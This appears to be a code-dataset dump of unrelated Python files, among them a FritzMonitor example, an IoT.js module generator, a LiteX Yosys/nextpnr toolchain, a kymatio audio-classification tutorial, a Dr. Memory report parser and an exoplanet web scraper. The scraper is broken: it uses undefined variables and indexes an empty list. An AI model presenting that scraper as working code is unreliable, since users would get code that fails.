"--timeout",
nargs="?",
type=int,
default=FRITZ_MONITOR_SOCKET_TIMEOUT,
const=None,
dest="timeout",
help="Setting for socket timeout [sec]."
"Default: %s" % FRITZ_MONITOR_SOCKET_TIMEOUT,
)
parser.add_argument(
"-c",
"--healthcheck",
nargs="?",
type=int,
default=HEALTHCHECK_TIMEOUT,
const=None,
dest="healthcheck",
help="Setting for internal health-check interval [sec]."
"Default: %s" % HEALTHCHECK_TIMEOUT,
)
args = parser.parse_args()
return args
def process_events(monitor, event_queue, healthcheck_interval):
while True:
try:
event = event_queue.get(timeout=healthcheck_interval)
except queue.Empty:
# check health:
if not monitor.is_alive:
raise OSError("Error: fritzmonitor connection failed")
else:
# do event processing here:
print(event)
def main():
"""
Entry point: example to use FritzMonitor.
"""
args = get_cli_arguments()
print_header(args)
# create a FritzMonitor instance and get the event_queue by calling start().
# start() returns the queue for the events.
try:
with FritzMonitor(address=args.address, timeout=args.timeout) as monitor:
event_queue = monitor.start()
process_events(monitor, event_queue, healthcheck_interval=args.healthcheck)
except (OSError, KeyboardInterrupt) as err:
print(err)
print("exit fritzmonitor")
if __name__ == "__main__":
main()
| StarcoderdataPython |
3301954 | <filename>tools/iotjs-create-module.py
#!/usr/bin/env python
# Copyright 2018-present Samsung Electronics Co., Ltd. and other contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
IOTJS_BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
TEMPLATE_BASE_DIR = os.path.join(os.path.dirname(__file__), 'module_templates')
MODULE_NAME_RE = "^[a-z0-9][a-z0-9\._]*$"
def load_templates(template_dir):
for root, dirs, files in os.walk(template_dir):
for fp in files:
yield os.path.relpath(os.path.join(root, fp), template_dir)
def replace_contents(input_file, module_name):
with open(input_file) as fp:
data = fp.read()
data = data.replace("$MODULE_NAME$", module_name)
data = data.replace("$IOTJS_PATH$", IOTJS_BASE_DIR)
return data
def create_module(output_dir, module_name, template_dir, template_files):
module_path = os.path.join(output_dir, module_name)
print("Creating module in {}".format(module_path))
if os.path.exists(module_path):
print("Module path ({}) already exists! Exiting".format(module_path))
return False
for file_name in template_files:
file_path = os.path.join(template_dir, file_name)
print("loading template file: {}".format(file_path))
contents = replace_contents(file_path, module_name)
output_path = os.path.join(module_path, file_name)
# create sub-dir if required
base_dir = os.path.dirname(output_path)
if not os.path.exists(base_dir):
os.mkdir(base_dir)
with open(output_path, "w") as fp:
fp.write(contents)
return True
def valid_module_name(value):
if not re.match(MODULE_NAME_RE, value):
msg = "Invalid module name, should match regexp: %s" % MODULE_NAME_RE
raise argparse.ArgumentTypeError(msg)
return value
if __name__ == "__main__":
import argparse
import sys
desc = "Create an IoT.js external module using a template"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("module_name", metavar="<MODULE NAME>", nargs=1,
type=valid_module_name,
help="name of the new module ((must be in lowercase " +
"and should match regexp: %s)" % MODULE_NAME_RE)
parser.add_argument("--path", default=".",
help="directory where the module will be created " +
"(default: %(default)s)")
parser.add_argument("--template", default="basic",
choices=["basic", "shared"],
help="type of the template which should be used "
"(default: %(default)s)")
args = parser.parse_args()
template_dir = os.path.join(TEMPLATE_BASE_DIR,
"%s_module_template" % args.template)
template_files = load_templates(template_dir)
created = create_module(args.path,
args.module_name[0],
template_dir,
template_files)
if created:
module_path = os.path.join(args.path, args.module_name[0])
print("Module created in: {}".format(os.path.abspath(module_path)))
| StarcoderdataPython |
1847010 | from selenium import webdriver
from bs4 import BeautifulSoup
import time
import csv
import requests
START_URL = "https://exoplanets.nasa.gov/exoplanet-catalog/"
browser = webdriver.Chrome("C:/Users/letsg/OneDrive/Desktop/Scraper-master/Scraper-master/chromedriver.exe")
browser.get(START_URL)
time.sleep(10)
def scrape():
headers = ["name", "light_years_from_earth", "planet_mass", "stellar_magnitude", "discovery_date","hyperlink","planet_type","plante_radius","orbital_radius","orbital_period","eccentricity"]
planet_data = []
for i in range(0, 428):
soup = BeautifulSoup(browser.page_source, "html.parser")
for ul_tag in soup.find_all("ul", attrs={"class", "exoplanet"}):
li_tags = ul_tag.find_all("li")
temp_list = []
for index, li_tag in enumerate(li_tags):
if index == 0:
temp_list.append(li_tag.find_all("a")[0].contents[0])
else:
try:
temp_list.append(li_tag.contents[0])
except:
temp_list.append("")
hyperlink_li_tag=li_tags[0]
temp_list.append("https://exoplanets.nasa.gov"+hyperlink_li_tag.find_all("a",href=True)[0]["href"])
planet_data.append(temp_list)
browser.find_element_by_xpath('//*[@id="primary_column"]/footer/div/div/div/nav/span[2]/a').click()
def scrap_more_data(hyperlink):
page=requests.get(hyperlink)
soup = BeautifulSoup(page.content,"html.parser")
for tr_tag in soup.find_all("tr",attrs={"class":"fact_row"}):
td_tags=tr_tag.find_all("td")
temp_list=[]
for td_tag in td_tags:
try:
temp_list.append(td_tag.find_all("div",attrs={"class":"value"})[0].contents[0])
except:
temp_list.append("")
new_planet_data.append(temp_list)
scrape()
for data in planet_data:
scrap_more_data(data[5])
final_planet_data=[]
for index,data in enumerate(planet_data):
final_planet_data.append(data+final_planet_data[index])
with open("final_csv", "w") as f:
csvwriter = csv.writer(f)
csvwriter.writerow(headers)
csvwriter.writerows(final_planet_data) | StarcoderdataPython |
90928 |
import numpy as np
def unflatten(w, weights):
sizes = [x.size for x in weights]
split_idx = np.cumsum(sizes)
update_ravelled = np.split(w, split_idx)[:-1]
shapes = [x.shape for x in weights]
update_list = [np.reshape(u, s) for s, u in zip(shapes, update_ravelled)]
return update_list
def flatten_update(update):
return np.concatenate([x.ravel() for x in update]) | StarcoderdataPython |
1837019 | <reponame>iwanimsand/pyPS4Controller<filename>pyPS4Controller/__main__.py
from pyPS4Controller.cli import Cli
def main():
Cli()
| StarcoderdataPython |
394041 | from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template.loader import get_template
from django.conf import settings
from functools import wraps
from .models import Product
def disable_for_loaddata(signal_handler):
"""
Decorator that turns off signal handlers when loading fixture data.
"""
@wraps(signal_handler)
def wrapper(*args, **kwargs):
if kwargs.get("raw"):
return
signal_handler(*args, **kwargs)
return wrapper
@receiver(post_save, sender=Product)
@disable_for_loaddata
def post_save_product(sender, instance, **kwargs):
"""
Notify all other admins about the change, either via email or other mechanism.
"""
# Find staff users's emails
to_users = [user.email for user in User.objects.filter(is_staff=True) if user.email]
# Send email to users
body_plain = get_template("email.txt")
body_html = get_template("email.html")
context = {
"sku": instance.sku,
"name": instance.name,
"price": instance.price,
"brand": instance.brand,
"sender": settings.DEFAULT_FROM_EMAIL,
}
send_mail(
"Product has changed",
body_plain.render(context),
settings.DEFAULT_FROM_EMAIL,
to_users,
html_message=body_html.render(context),
fail_silently=False,
)
| StarcoderdataPython |
1947769 | <filename>litex/build/xilinx/yosys_nextpnr.py
#
# This file is part of LiteX.
#
# Copyright (c) 2020 Antmicro <www.antmicro.com>
# Copyright (c) 2020 <NAME> <<EMAIL>>
# Copyright (c) 2022 <NAME> <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
import os
import subprocess
import sys
import math
from typing import NamedTuple, Union, List
import re
from shutil import which
from migen.fhdl.structure import _Fragment, wrap, Constant
from migen.fhdl.specials import Instance
from litex.build.generic_platform import *
from litex.build.xilinx.vivado import _xdc_separator, _format_xdc, _build_xdc
from litex.build import tools
from litex.build.xilinx import common
def _unwrap(value):
return value.value if isinstance(value, Constant) else value
# Makefile -----------------------------------------------------------------------------------------
class _MakefileGenerator:
class Var(NamedTuple):
name: str
value: Union[str, List[str]] = ""
class Rule(NamedTuple):
target: str
prerequisites: List[str] = []
commands: List[str] = []
phony: bool = False
def __init__(self, ast):
self.ast = ast
def generate(self):
makefile = []
for entry in self.ast:
if isinstance(entry, str):
makefile.append(entry)
elif isinstance(entry, self.Var):
if not entry.value:
makefile.append(f"{entry.name} :=")
elif isinstance(entry.value, list):
indent = " " * (len(entry.name) + len(" := "))
line = f"{entry.name} := {entry.value[0]}"
for value in entry.value[1:]:
line += " \\"
makefile.append(line)
line = indent + value
makefile.append(line)
elif isinstance(entry.value, str):
makefile.append(f"{entry.name} := {entry.value}")
else:
raise
elif isinstance(entry, self.Rule):
makefile.append("")
if entry.phony:
makefile.append(f".PHONY: {entry.target}")
makefile.append(" ".join([f"{entry.target}:", *entry.prerequisites]))
for cmd in entry.commands:
makefile.append(f"\t{cmd}")
return "\n".join(makefile)
def _run_make():
make_cmd = ["make", "-j1"]
if which("nextpnr-xilinx") is None:
msg = "Unable to find Yosys+Nextpnr toolchain, please:\n"
msg += "- Add Yosys and Nextpnr tools to your $PATH."
raise OSError(msg)
if tools.subprocess_call_filtered(make_cmd, common.colors) != 0:
raise OSError("Error occured during yosys or nextpnr script execution.")
# YosysNextpnrToolchain -------------------------------------------------------------------------------
class YosysNextpnrToolchain:
attr_translate = {
#"keep": ("dont_touch", "true"),
#"no_retiming": ("dont_touch", "true"),
#"async_reg": ("async_reg", "true"),
#"mr_ff": ("mr_ff", "true"), # user-defined attribute
#"ars_ff1": ("ars_ff1", "true"), # user-defined attribute
#"ars_ff2": ("ars_ff2", "true"), # user-defined attribute
#"no_shreg_extract": None
}
def __init__(self):
self.clocks = dict()
self.false_paths = set()
self.symbiflow_device = None
self.bitstream_device = None
self._partname = None
def _check_properties(self, platform):
if not self.symbiflow_device:
try:
self.symbiflow_device = {
# FIXME: fine for now since only a few devices are supported, do more clever device re-mapping.
"xc7a35ticsg324-1L" : "xc7a35t",
"xc7a100tcsg324-1" : "xc7a35t",
"xc7z010clg400-1" : "xc7z010",
"xc7z020clg400-1" : "xc7z020",
}[platform.device]
except KeyError:
raise ValueError(f"symbiflow_device is not specified")
if not self.bitstream_device:
try:
# bitstream_device points to a directory in prjxray database
# available bitstream_devices: artix7, kintex7, zynq7
self.bitstream_device = {
"xc7a": "artix7", # xc7a35t, xc7a50t, xc7a100t, xc7a200t
"xc7z": "zynq7", # xc7z010, xc7z020
}[platform.device[:4]]
except KeyError:
raise ValueError(f"Unsupported device: {platform.device}")
# FIXME: prjxray-db doesn't have xc7a35ticsg324-1L - use closest replacement
self._partname = {
"xc7a35ticsg324-1L" : "xc7a35tcsg324-1",
"xc7a100tcsg324-1" : "xc7a100tcsg324-1",
"xc7a200t-sbg484-1" : "xc7a200tsbg484-1",
"xc7z010clg400-1" : "xc7z010clg400-1",
"xc7z020clg400-1" : "xc7z020clg400-1",
}.get(platform.device, platform.device)
def _generate_makefile(self, platform, build_name):
Var = _MakefileGenerator.Var
Rule = _MakefileGenerator.Rule
makefile = _MakefileGenerator([
"# Autogenerated by LiteX / git: " + tools.get_litex_git_revision() + "\n",
Var("TOP", build_name),
Var("PARTNAME", self._partname),
Var("DEVICE", self.symbiflow_device),
Var("BITSTREAM_DEVICE", self.bitstream_device),
"",
Var("DB_DIR", "/usr/share/nextpnr/prjxray-db"), #FIXME: resolve path
Var("CHIPDB_DIR", "/usr/share/nextpnr/xilinx-chipdb"), #FIXME: resolve path
"",
Var("VERILOG", [f for f,language,_ in platform.sources if language in ["verilog", "system_verilog"]]),
Var("MEM_INIT", [f"{name}" for name in os.listdir() if name.endswith(".init")]),
Var("SDC", f"{build_name}.sdc"),
Var("XDC", f"{build_name}.xdc"),
Var("ARTIFACTS", [
"$(TOP).fasm", "$(TOP).frames",
"*.bit", "*.fasm", "*.json", "*.log", "*.rpt",
"constraints.place"
]),
Rule("all", ["$(TOP).bit"], phony=True),
Rule("$(TOP).json", ["$(VERILOG)", "$(MEM_INIT)", "$(XDC)"], commands=[
#"symbiflow_synth -t $(TOP) -v $(VERILOG) -d $(BITSTREAM_DEVICE) -p $(PARTNAME) -x $(XDC) > /dev/null"
#yosys -p "synth_xilinx -flatten -abc9 -nosrl -noclkbuf -nodsp -iopad -nowidelut" #forum: symbiflow_synth
'yosys -p "synth_xilinx -flatten -abc9 -nobram -arch xc7 -top $(TOP); write_json $(TOP).json" $(VERILOG) > /dev/null'
]),
Rule("$(TOP).fasm", ["$(TOP).json"], commands=[
#"symbiflow_write_fasm -e $(TOP).eblif -d $(DEVICE) > /dev/null"
'nextpnr-xilinx --chipdb $(CHIPDB_DIR)/$(DEVICE).bin --xdc $(XDC) --json $(TOP).json --write $(TOP)_routed.json --fasm $(TOP).fasm > /dev/null'
]),
Rule("$(TOP).frames", ["$(TOP).fasm"], commands=[
'fasm2frames.py --part $(PARTNAME) --db-root $(DB_DIR)/$(BITSTREAM_DEVICE) $(TOP).fasm > $(TOP).frames'
]),
Rule("$(TOP).bit", ["$(TOP).frames"], commands=[
#"symbiflow_write_bitstream -d $(BITSTREAM_DEVICE) -f $(TOP).fasm -p $(PARTNAME) -b $(TOP).bit > /dev/null"
'xc7frames2bit --part_file $(DB_DIR)/$(BITSTREAM_DEVICE)/$(PARTNAME)/part.yaml --part_name $(PARTNAME) --frm_file $(TOP).frames --output_file $(TOP).bit > /dev/null'
]),
Rule("clean", phony=True, commands=[
"rm -f $(ARTIFACTS)"
]),
])
tools.write_to_file("Makefile", makefile.generate())
def _build_clock_constraints(self, platform):
platform.add_platform_command(_xdc_separator("Clock constraints"))
#for clk, period in sorted(self.clocks.items(), key=lambda x: x[0].duid):
# platform.add_platform_command(
# "create_clock -period " + str(period) +
# " {clk}", clk=clk)
pass #clock constraints not supported
def _fix_instance(self, instance):
pass
def build(self, platform, fragment,
build_dir = "build",
build_name = "top",
run = True,
enable_xpm = False,
**kwargs):
self._check_properties(platform)
# Create build directory
os.makedirs(build_dir, exist_ok=True)
cwd = os.getcwd()
os.chdir(build_dir)
# Finalize design
if not isinstance(fragment, _Fragment):
fragment = fragment.get_fragment()
platform.finalize(fragment)
# toolchain-specific fixes
for instance in fragment.specials:
if isinstance(instance, Instance):
self._fix_instance(instance)
# Generate timing constraints
self._build_clock_constraints(platform)
# Generate verilog
v_output = platform.get_verilog(fragment, name=build_name, **kwargs)
named_sc, named_pc = platform.resolve_signals(v_output.ns)
v_file = build_name + ".v"
v_output.write(v_file)
platform.add_source(v_file)
self._generate_makefile(
platform = platform,
build_name = build_name
)
# Generate design constraints
tools.write_to_file(build_name + ".xdc", _build_xdc(named_sc, named_pc))
if run:
_run_make()
os.chdir(cwd)
return v_output.ns
def add_period_constraint(self, platform, clk, period):
clk.attr.add("keep")
period = math.floor(period*1e3)/1e3 # round to lowest picosecond
if clk in self.clocks:
if period != self.clocks[clk]:
raise ValueError("Clock already constrained to {:.2f}ns, new constraint to {:.2f}ns"
.format(self.clocks[clk], period))
self.clocks[clk] = period
def add_false_path_constraint(self, platform, from_, to):
# FIXME: false path constraints are currently not supported by the symbiflow toolchain
return
def symbiflow_build_args(parser):
pass
def symbiflow_build_argdict(args):
return dict()
| StarcoderdataPython |
147282 | <gh_stars>100-1000
"""
Classification of spoken digit recordings
=========================================
In this example we use the 1D scattering transform to represent spoken digits,
which we then classify using a simple classifier. This shows that 1D scattering
representations are useful for this type of problem.
This dataset is automatically downloaded and preprocessed from
https://github.com/Jakobovski/free-spoken-digit-dataset.git
Downloading and precomputing scattering coefficients should take about 5 min.
Running the gradient descent takes about 1 min.
Results:
Training accuracy = 99.7%
Testing accuracy = 98.0%
"""
###############################################################################
# Preliminaries
# -------------
#
# Since we're using PyTorch to train the model, import `torch`.
import torch
###############################################################################
# We will be constructing a logistic regression classifier on top of the
# scattering coefficients, so we need some of the neural network tools from
# `torch.nn` and the Adam optimizer from `torch.optim`.
from torch.nn import Linear, NLLLoss, LogSoftmax, Sequential
from torch.optim import Adam
###############################################################################
# To handle audio file I/O, we import `os` and `scipy.io.wavfile`. We also need
# `numpy` for some basic array manipulation.
from scipy.io import wavfile
import os
import numpy as np
###############################################################################
# To evaluate our results, we need to form a confusion matrix using
# scikit-learn and display them using `matplotlib`.
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
###############################################################################
# Finally, we import the `Scattering1D` class from the `kymatio.torch` package
# and the `fetch_fsdd` function from `kymatio.datasets`. The `Scattering1D`
# class is what lets us calculate the scattering transform, while the
# `fetch_fsdd` function downloads the FSDD, if needed.
from kymatio.torch import Scattering1D
from kymatio.datasets import fetch_fsdd
###############################################################################
# Pipeline setup
# --------------
# We start by specifying the dimensions of our processing pipeline along with
# some other parameters.
#
# First, we have signal length. Longer signals are truncated and shorter
# signals are zero-padded. The sampling rate is 8000 Hz, so this corresponds to
# little over a second.
T = 2**13
###############################################################################
# Maximum scale 2**J of the scattering transform (here, about 30 milliseconds)
# and the number of wavelets per octave.
J = 8
Q = 12
###############################################################################
# We need a small constant to add to the scattering coefficients before
# computing the logarithm. This prevents very large values when the scattering
# coefficients are very close to zero.
log_eps = 1e-6
###############################################################################
# If a GPU is available, let's use it!
use_cuda = torch.cuda.is_available()
###############################################################################
# For reproducibility, we fix the seed of the random number generator.
torch.manual_seed(42)
###############################################################################
# Loading the data
# ----------------
# Once the parameter are set, we can start loading the data into a format that
# can be fed into the scattering transform and then a logistic regression
# classifier.
#
# We first download the dataset. If it's already downloaded, `fetch_fsdd` will
# simply return the information corresponding to the dataset that's already
# on disk.
info_data = fetch_fsdd()
files = info_data['files']
path_dataset = info_data['path_dataset']
###############################################################################
# Set up Tensors to hold the audio signals (`x_all`), the labels (`y_all`), and
# whether the signal is in the train or test set (`subset`).
x_all = torch.zeros(len(files), T, dtype=torch.float32)
y_all = torch.zeros(len(files), dtype=torch.int64)
subset = torch.zeros(len(files), dtype=torch.int64)
###############################################################################
# For each file in the dataset, we extract its label `y` and its index from the
# filename. If the index is between 0 and 4, it is placed in the test set, while
# files with larger indices are used for training. The actual signals are
# normalized to have maximum amplitude one, and are truncated or zero-padded
# to the desired length `T`. They are then stored in the `x_all` Tensor while
# their labels are in `y_all`.
for k, f in enumerate(files):
basename = f.split('.')[0]
# Get label (0-9) of recording.
y = int(basename.split('_')[0])
# Index larger than 5 gets assigned to training set.
if int(basename.split('_')[2]) >= 5:
subset[k] = 0
else:
subset[k] = 1
# Load the audio signal and normalize it.
_, x = wavfile.read(os.path.join(path_dataset, f))
x = np.asarray(x, dtype='float')
x /= np.max(np.abs(x))
# Convert from NumPy array to PyTorch Tensor.
x = torch.from_numpy(x)
# If it's too long, truncate it.
if x.numel() > T:
x = x[:T]
# If it's too short, zero-pad it.
start = (T - x.numel()) // 2
x_all[k,start:start + x.numel()] = x
y_all[k] = y
###############################################################################
# Log-scattering transform
# ------------------------
# We now create the `Scattering1D` object that will be used to calculate the
# scattering coefficients.
scattering = Scattering1D(J, T, Q)
###############################################################################
# If we are using CUDA, the scattering transform object must be transferred to
# the GPU by calling its `cuda()` method. The data is similarly transferred.
if use_cuda:
scattering.cuda()
x_all = x_all.cuda()
y_all = y_all.cuda()
###############################################################################
# Compute the scattering transform for all signals in the dataset.
Sx_all = scattering.forward(x_all)
###############################################################################
# Since it does not carry useful information, we remove the zeroth-order
# scattering coefficients, which are always placed in the first channel of
# the scattering Tensor.
Sx_all = Sx_all[:,1:,:]
###############################################################################
# To increase discriminability, we take the logarithm of the scattering
# coefficients (after adding a small constant to make sure nothing blows up
# when scattering coefficients are close to zero). This is known as the
# log-scattering transform.
Sx_all = torch.log(torch.abs(Sx_all) + log_eps)
###############################################################################
# Finally, we average along the last dimension (time) to get a time-shift
# invariant representation.
Sx_all = torch.mean(Sx_all, dim=-1)
###############################################################################
# Training the classifier
# -----------------------
# With the log-scattering coefficients in hand, we are ready to train our
# logistic regression classifier.
#
# First, we extract the training data (those for which `subset` equals `0`)
# and the associated labels.
Sx_tr, y_tr = Sx_all[subset == 0], y_all[subset == 0]
###############################################################################
# Standardize the data to have mean zero and unit variance. Note that we need
# to apply the same transformation to the test data later, so we save the
# mean and standard deviation Tensors.
mu_tr = Sx_tr.mean(dim=0)
std_tr = Sx_tr.std(dim=0)
Sx_tr = (Sx_tr - mu_tr) / std_tr
###############################################################################
# Here we define a logistic regression model using PyTorch. We train it using
# Adam with a negative log-likelihood loss.
num_input = Sx_tr.shape[-1]
num_classes = y_tr.cpu().unique().numel()
model = Sequential(Linear(num_input, num_classes), LogSoftmax(dim=1))
optimizer = Adam(model.parameters())
criterion = NLLLoss()
###############################################################################
# As before, if we're on a GPU, transfer the model and the loss function onto
# the device.
if use_cuda:
model = model.cuda()
criterion = criterion.cuda()
###############################################################################
# Before training the model, we set some parameters for the optimization
# procedure.
# Number of signals to use in each gradient descent step (batch).
batch_size = 32
# Number of epochs.
num_epochs = 50
# Learning rate for Adam.
lr = 1e-4
###############################################################################
# Given these parameters, we compute the total number of batches.
nsamples = Sx_tr.shape[0]
nbatches = nsamples // batch_size
###############################################################################
# Now we're ready to train the classifier.
for e in range(num_epochs):
# Randomly permute the data. If necessary, transfer the permutation to the
# GPU.
perm = torch.randperm(nsamples)
if use_cuda:
perm = perm.cuda()
# For each batch, calculate the gradient with respect to the loss and take
# one step.
for i in range(nbatches):
idx = perm[i * batch_size : (i+1) * batch_size]
model.zero_grad()
resp = model.forward(Sx_tr[idx])
loss = criterion(resp, y_tr[idx])
loss.backward()
optimizer.step()
# Calculate the response of the training data at the end of this epoch and
# the average loss.
resp = model.forward(Sx_tr)
avg_loss = criterion(resp, y_tr)
# Try predicting the classes of the signals in the training set and compute
# the accuracy.
y_hat = resp.argmax(dim=1)
accuracy = (y_tr == y_hat).float().mean()
print('Epoch {}, average loss = {:1.3f}, accuracy = {:1.3f}'.format(
e, avg_loss, accuracy))
###############################################################################
# Now that our network is trained, let's test it!
#
# First, we extract the test data (those for which `subset` equals `1`) and the
# associated labels.
Sx_te, y_te = Sx_all[subset == 1], y_all[subset == 1]
###############################################################################
# Use the mean and standard deviation calculated on the training data to
# standardize the testing data, as well.
Sx_te = (Sx_te - mu_tr) / std_tr
###############################################################################
# Calculate the response of the classifier on the test data and the resulting
# loss.
resp = model.forward(Sx_te)
avg_loss = criterion(resp, y_te)
# Try predicting the labels of the signals in the test data and compute the
# accuracy.
y_hat = resp.argmax(dim=1)
accu = (y_te == y_hat).float().mean()
print('TEST, average loss = {:1.3f}, accuracy = {:1.3f}'.format(
avg_loss, accu))
###############################################################################
# Plotting the classification accuracy as a confusion matrix
# ----------------------------------------------------------
# Let's see what the very few misclassified sounds get misclassified as. We
# will plot a confusion matrix which indicates in a 2D histogram how often
# one sample was mistaken for another (anything on the diagonal is correctly
# classified, anything off the diagonal is wrong).
predicted_categories = y_hat.cpu().numpy()
actual_categories = y_te.cpu().numpy()
confusion = confusion_matrix(actual_categories, predicted_categories)
plt.figure()
plt.imshow(confusion)
tick_locs = np.arange(10)
ticks = ['{}'.format(i) for i in range(1, 11)]
plt.xticks(tick_locs, ticks)
plt.yticks(tick_locs, ticks)
plt.ylabel("True number")
plt.xlabel("Predicted number")
plt.show()
| StarcoderdataPython |
3458624 | <reponame>Gitman1989/chromium
#!/usr/bin/python
# Copyright (c) 2006-2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# drmemory_analyze.py
''' Given a ThreadSanitizer output file, parses errors and uniques them.'''
import logging
import optparse
import os
import re
import subprocess
import sys
import time
class _StackTraceLine(object):
def __init__(self, line, address, binary):
self.raw_line_ = line
self.address = address
self.binary = binary
def __str__(self):
return self.raw_line_
class DrMemoryAnalyze:
''' Given a set of Dr.Memory output files, parse all the errors out of
them, unique them and output the results.'''
def __init__(self, source_dir, files):
'''Reads in a set of files.
Args:
source_dir: Path to top of source tree for this build
files: A list of filenames.
'''
self.reports = []
self.used_suppressions = {}
for file in files:
self.ParseReportFile(file)
def ReadLine(self):
self.line_ = self.cur_fd_.readline()
self.stack_trace_line_ = None
def ReadSection(self):
FILE_PREFIXES_TO_CUT = [
"build\\src\\",
"crt_bld\\self_x86\\",
]
CUT_STACK_BELOW = ".*testing.*Test.*Run.*"
result = [self.line_]
self.ReadLine()
cnt = 1
while len(self.line_.strip()) > 0:
tmp_line = self.line_
match_syscall = re.search("system call (.*)\n", tmp_line)
if match_syscall:
syscall_name = match_syscall.groups()[0]
result.append(" #%2i <sys.call> %s\n" % (cnt, syscall_name))
cnt = cnt + 1
self.ReadLine() # skip "<system call> line
self.ReadLine()
continue
# Dr. Memory sometimes prints adjacent malloc'ed regions next to the
# access address in the UNADDRESSABLE ACCESS reports like this:
# Note: next higher malloc: <address range>
# Note: prev lower malloc: <address range>
match_malloc_info = re.search("Note: .* malloc: 0x.*", tmp_line)
if match_malloc_info:
result.append(tmp_line)
self.ReadLine()
continue
match_binary_fname = re.search("(0x[0-9a-fA-F]+) <.*> (.*)!([^+]*)"
"(?:\+0x[0-9a-fA-F]+)?\n", tmp_line)
self.ReadLine()
match_src_line = re.search("\s*(.*):([0-9]+)(?:\+0x[0-9a-fA-F]+)?",
self.line_)
if match_src_line:
self.ReadLine()
if match_binary_fname:
pc, binary, fname = match_binary_fname.groups()
if re.search(CUT_STACK_BELOW, fname):
break
report_line = (" #%2i %s %-50s" % (cnt, pc, fname))
if not re.search("\.exe$", binary):
# Print the DLL name
report_line += " " + binary
src, lineno = match_src_line.groups()
if src != "??":
for pat in FILE_PREFIXES_TO_CUT:
idx = src.rfind(pat)
if idx != -1:
src = src[idx+len(pat):]
report_line += " " + src
if int(lineno) != 0:
report_line += ":%i" % int(lineno)
result.append(report_line + "\n")
cnt = cnt + 1
return result
def ParseReportFile(self, filename):
self.cur_fd_ = open(filename, 'r')
while True:
self.ReadLine()
if (self.line_ == ''):
break
if re.search("Grouping errors that", self.line_):
# DrMemory has finished working.
break
tmp = []
match = re.search("^Error #[0-9]+: (.*)", self.line_)
if match:
self.line_ = match.groups()[0].strip() + "\n"
tmp.extend(self.ReadSection())
self.reports.append(tmp)
elif self.line_.startswith("ASSERT FAILURE"):
self.reports.append(self.line_.strip())
self.cur_fd_.close()
def Report(self, check_sanity):
sys.stdout.flush()
#TODO(timurrrr): support positive tests / check_sanity==True
if len(self.reports) > 0:
logging.error("Found %i error reports" % len(self.reports))
for report_list in self.reports:
report = ''
for line in report_list:
report += str(line)
logging.error('\n' + report)
logging.error("Total: %i error reports" % len(self.reports))
return -1
logging.info("PASS: No error reports found")
return 0
if __name__ == '__main__':
'''For testing only. The DrMemoryAnalyze class should be imported instead.'''
retcode = 0
parser = optparse.OptionParser("usage: %prog [options] <files to analyze>")
parser.add_option("", "--source_dir",
help="path to top of source tree for this build"
"(used to normalize source paths in baseline)")
(options, args) = parser.parse_args()
if len(args) == 0:
parser.error("no filename specified")
filenames = args
analyzer = DrMemoryAnalyze(options.source_dir, filenames)
retcode = analyzer.Report(False)
sys.exit(retcode)
| StarcoderdataPython |
4834310 | <reponame>orsveri/3DSSG<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
if __name__ == '__main__' and __package__ is None:
from os import sys
sys.path.append('../')
import torch
import torch.optim as optim
import torch.nn.functional as F
from model_base import BaseModel
from network_PointNet import PointNetfeat,PointNetCls,PointNetRelCls,PointNetRelClsMulti
from network_TripletGCN import TripletGCNModel
from network_GNN import GraphEdgeAttenNetworkLayers
from config import Config
import op_utils
class SGPNModel(BaseModel):
def __init__(self,config:Config,name:str, num_class, num_rel):
'''
Scene graph prediction network from https://arxiv.org/pdf/2004.03967.pdf
'''
super().__init__(name,config)
models = dict()
self.mconfig = mconfig = config.MODEL
with_bn = mconfig.WITH_BN
self.flow = 'target_to_source' # we want the mess
dim_point = 3
dim_point_rel = 3
if mconfig.USE_RGB:
dim_point +=3
dim_point_rel+=3
if mconfig.USE_NORMAL:
dim_point +=3
dim_point_rel+=3
if mconfig.USE_CONTEXT:
dim_point_rel += 1
# Object Encoder
models['obj_encoder'] = PointNetfeat(
global_feat=True,
batch_norm=with_bn,
point_size=dim_point,
input_transform=False,
feature_transform=mconfig.feature_transform,
out_size=mconfig.point_feature_size)
# Relationship Encoder
models['rel_encoder'] = PointNetfeat(
global_feat=True,
batch_norm=with_bn,
point_size=dim_point_rel,
input_transform=False,
feature_transform=mconfig.feature_transform,
out_size=mconfig.edge_feature_size)
# GCN
# models['gcn'] = GraphTripleConvNet(input_dim_obj=mconfig.point_feature_size,
# num_layers=mconfig.N_LAYERS,
# residual=mconfig.RESIDUAL,
# pooling=mconfig.POOLING,
# input_dim_pred=mconfig.point_feature_size,
# hidden_dim=mconfig.gcn_hidden_feature_size)
# if mconfig.GCN_TYPE != 'TRIP':
# raise RuntimeError('PointNetGCNModel only support TRIP GCN type')
# models['gcn'] = TripletGCNModel(num_layers=mconfig.N_LAYERS,
# dim_node = mconfig.point_feature_size,
# dim_edge = mconfig.point_feature_size,
# dim_hidden = mconfig.gcn_hidden_feature_size)
if mconfig.GCN_TYPE == "TRIP":
models['gcn'] = TripletGCNModel(num_layers=mconfig.N_LAYERS,
dim_node = mconfig.point_feature_size,
dim_edge = mconfig.edge_feature_size,
dim_hidden = mconfig.gcn_hidden_feature_size)
elif mconfig.GCN_TYPE == 'EAN':
models['gcn'] = GraphEdgeAttenNetworkLayers(self.mconfig.point_feature_size,
self.mconfig.edge_feature_size,
self.mconfig.DIM_ATTEN,
self.mconfig.N_LAYERS,
self.mconfig.NUM_HEADS,
self.mconfig.GCN_AGGR,
flow=self.flow)
# node feature classifier
models['obj_predictor'] = PointNetCls(num_class, in_size=mconfig.point_feature_size,
batch_norm=with_bn,drop_out=True)
if mconfig.multi_rel_outputs:
models['rel_predictor'] = PointNetRelClsMulti(
num_rel,
in_size=mconfig.edge_feature_size,
batch_norm=with_bn,drop_out=True)
